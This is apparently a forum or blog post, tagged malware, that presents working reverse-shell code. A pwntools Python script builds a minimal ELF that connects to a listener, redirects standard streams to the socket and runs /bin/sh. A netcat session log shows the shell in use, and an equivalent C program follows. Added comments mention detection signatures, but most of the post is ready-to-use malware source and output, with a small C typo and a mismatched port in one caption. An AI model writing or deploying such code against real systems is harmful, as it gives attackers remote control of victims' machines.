BATTLE PROGRAMMER AKIRA

  1. REVERSE SHELL - bash

    Tags
    malware
    By AKIRA BASHO il 12 April 2023
     

    #!/usr/bin/python3
    # Builds a tiny static ELF (saved as 'lnxmw1') whose only job is to open a
    # TCP connection to ipaddr:port, bind stdin/stdout/stderr to that socket and
    # start /bin/sh -- the reverse-shell pattern described in the text below.
    # Kept as a reference sample for analysis; the run log below shows the
    # properties of the produced binary.

    # NOTE(review): os, random, subprocess and string are imported but never used.
    import os, random, subprocess, string
    from pwn import *

    # Connect-back target.  Loopback here; the hard-coded IP/port pair baked
    # into the binary is the network indicator monitoring would key on.
    ipaddr = '127.0.0.1'
    port = 31337
    # NOTE(review): outfile is assigned but never used; the ELF is saved under
    # the literal name 'lnxmw1' below.
    outfile = 'connectback'

    # Target architecture for the assembled code (reported as amd64-64-little
    # in the run log below).
    context(arch='x86_64')
    # socket(AF_INET, SOCK_STREAM) followed by connect() to ipaddr:port.
    code = shellcraft.socket(network='ipv4', proto='tcp')
    code += shellcraft.connect(ipaddr, port, network='ipv4')
    # Redirect fds 0/1/2 onto the socket.  The descriptor is read from rbp --
    # presumably left there by the preceding snippet; not verified here.
    code += shellcraft.dup2('rbp', 0)
    code += shellcraft.dup2('rbp', 1)
    code += shellcraft.dup2('rbp', 2)
    # Exec of /bin/sh.  Detection hook: a shell whose std fds are a TCP socket.
    code += shellcraft.sh()

    # Wrap the raw code in a minimal ELF.  The run log below shows it carries
    # none of the hardening a normal toolchain applies (no RELRO, no canary,
    # NX disabled, no PIE, RWX segments) -- a useful heuristic for spotting
    # hand-assembled binaries on disk.
    elf = ELF.from_assembly(code)
    elf.save('lnxmw1')

    ;piccolo malware elf creato con python e con la libreria pwntools

    ./lnxmw1.py
    [*] '/tmp/pwn-asm-02ut4aj4/step3'
    Arch: amd64-64-little
    RELRO: No RELRO
    Stack: No canary found
    NX: NX disabled
    PIE: No PIE (0xffff000)
    RWX: Has RWX segments

    ./lnxmw1

    nc -l 31337
    whoami
    re
    ls -lrt
    total 20
    -rwxrwxr-x 1 re re 794 Apr 12 09:28 restatic.py
    -rw-rw-r-- 1 re re 70 Apr 12 10:29 gamma.sh
    -rwxrwxr-x 1 re re 447 Apr 12 16:07 lnxmw1.py
    -rwxrwxr-x 1 re re 4784 Apr 12 16:07 lnxmw1

    ;esecuzione del malware con server netcat in ascolto sulla porta 31773; il malware crea una reverse shell nel server in ascolto

    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/ip.h>
    #include <arpa/inet.h>
    #include <unistd.h>

    // Hand-written C equivalent of the pwntools sample above: connect to
    // ip:4444, point fds 0/1/2 at the socket, then exec /bin/sh.
    // Note this variant uses port 4444 while the Python sample used 31337.
    int main () {
    // attacker IP address
    const char* ip = "127.0.0.1";
    // address struct
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    // port in network byte order
    addr.sin_port = htons(4444);
    inet_aton(ip, &addr.sin_addr);
    // socket syscall
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    // connect syscall
    connect(sockfd, (struct sockadr *)&addr, sizeof(addr));

    // Bind stdin/stdout/stderr to the socket.  For defenders: a process whose
    // fds 0-2 are a TCP socket, followed by an exec of /bin/sh, is the
    // signature most reverse-shell detections (auditd/EDR rules,
    // /proc/<pid>/fd inspection) are built around.
    for (int i = 0; i < 3; i++) {
    // dup2(sockftd, 0) - stdin
    // dup2(sockfd, 1) - stdout
    // dup2(sockfd, 2) - stderr
    dup2(sockfd, i);
    }

    // execve syscall
    execve("/bin/sh", NULL, NULL);
    return 0;
    }

    ;codice equivalente in C

    Edited by AKIRA BASHO - 2/5/2023, 17:00